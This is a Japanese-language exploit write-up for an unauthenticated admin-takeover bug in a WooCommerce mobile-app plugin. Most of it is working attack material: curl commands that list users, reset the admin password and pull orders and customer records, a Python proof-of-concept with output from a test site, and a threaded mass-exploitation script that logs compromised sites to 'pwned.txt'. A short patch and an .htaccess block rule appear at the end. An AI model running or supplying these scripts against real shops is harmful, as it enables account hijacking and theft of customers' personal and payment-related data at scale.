
Hippoo Mobile App for WooCommerce <= 1.9.4 - 未認証の認証バイパスによる管理者アカウント乗っ取り
未認証 → ロジック混同バグによる管理者アカウント乗っ取り
| CVE | CVE-2026-10580 |
| プラグイン | Hippoo Mobile App for WooCommerce |
| バージョン | ≤ 1.9.4 |
| CVSS | 9.8(クリティカル) |
| 認証必須 | ❌ 不要 |
| 管理者乗っ取り | ✅ 可能 |
| WooCommerceデータ | ✅ フルアクセス |
get_user_permissions() 関数は 管理者(正しい)と 未認証ユーザー(誤り)の両方に対して null を返します。
has_role_access() は null を見ると → フルアクセスを許可します。
その結果:
/wp-json/wc-hippoo/v1/ext/*
→ ログイン不要、Cookie不要、nonce不要
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users?per_page=10" | jq .
curl -X POST "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users/1" \
-H "Content-Type: application/json" \
-d '{"password":"Pwned123!"}'
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/orders?per_page=50"
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/customers?per_page=50"
#!/usr/bin/env python3
import requests
import sys
import json
def exploit(target, admin_id=1, new_password="PwnedCVE2026!!"):
base = target.rstrip('/')
# Step 1 - Enumeration
users_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users"
r = requests.get(users_url)
if r.status_code != 200:
print(f"[-] Not vulnerable: {target}")
return False
users = r.json()
print(f"[+] Found {len(users)} user(s)")
# Step 2 - Password reset
takeover_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users/{admin_id}"
r2 = requests.post(takeover_url, json={"password": new_password})
if r2.status_code == 200:
print(f"[✓] ADMIN TAKEOVER: {target}")
print(f" Login: {base}/wp-admin")
print(f" Password: {new_password}")
return True
else:
print(f"[-] Failed: {target}")
return False
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} https://target.com")
sys.exit(1)
exploit(sys.argv[1])
python3 exploit.py https://poloss.ddev.site
出力:
[+] Found 1 user(s)
[✓] ADMIN TAKEOVER: https://poloss.ddev.site
Login: https://poloss.ddev.site/wp-admin
Password: PwnedCVE2026!!
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
def takeover(target):
try:
r = requests.post(
f"{target.rstrip('/')}/wp-json/wc-hippoo/v1/ext/wp/v2/users/1",
json={"password": "MassPwned2026!!"},
timeout=10
)
if r.status_code == 200:
print(f"[✓] TAKEOVER: {target}")
with open("pwned.txt", "a") as f:
f.write(f"{target} | admin | MassPwned2026!!\n")
except:
pass
with open("targets.txt") as f:
urls = [line.strip() for line in f if line.strip()]
with ThreadPoolExecutor(max_workers=20) as executor:
for url in urls:
executor.submit(takeover, url)
if (empty($user) || !$user->exists()) {
return false; // NULLではなくfalse
}
if ($perms === false) {
return false; // 未認証は拒否
}
RewriteCond %{REQUEST_URI} ^/wp-json/wc-hippoo/v1/ext/
RewriteCond %{HTTP_COOKIE} !wordpress_logged_in
RewriteRule .* - [F,L]
CVE-2026-10580 • 100% PoC • 認証不要 • 完全管理者乗っ取り
#WordPress #WooCommerce #Poloss #W.P.E.F
| エンドポイント | データ |
|---|
/wp-json/wc-hippoo/v1/ext/wp/v2/users | 全WPユーザー |
/wp-json/wc-hippoo/v1/ext/wp/v2/users/1 | 管理者乗っ取り |
/wp-json/wc-hippoo/v1/ext/wc/v3/orders | 全注文詳細 |
/wp-json/wc-hippoo/v1/ext/wc/v3/products | 商品+在庫 |
/wp-json/wc-hippoo/v1/ext/wc/v3/customers | 顧客個人情報 |
/wp-json/wc-hippoo/v1/ext/wc/v3/coupons | クーポンコード |
/wp-json/wc-hippoo/v1/ext/wc/v3/reports | 売上レポート |
/wp-json/wc-hippoo/v1/ext/wc/v3/payment_gateways | 決済設定 |
| ベクトル | 値 |
|---|
| AV | ネットワーク |
| AC | 低 |
| PR | 不要 |
| UI | 不要 |
| S | 不変 |
| C | 高 |
| I | 高 |
| A | 高 |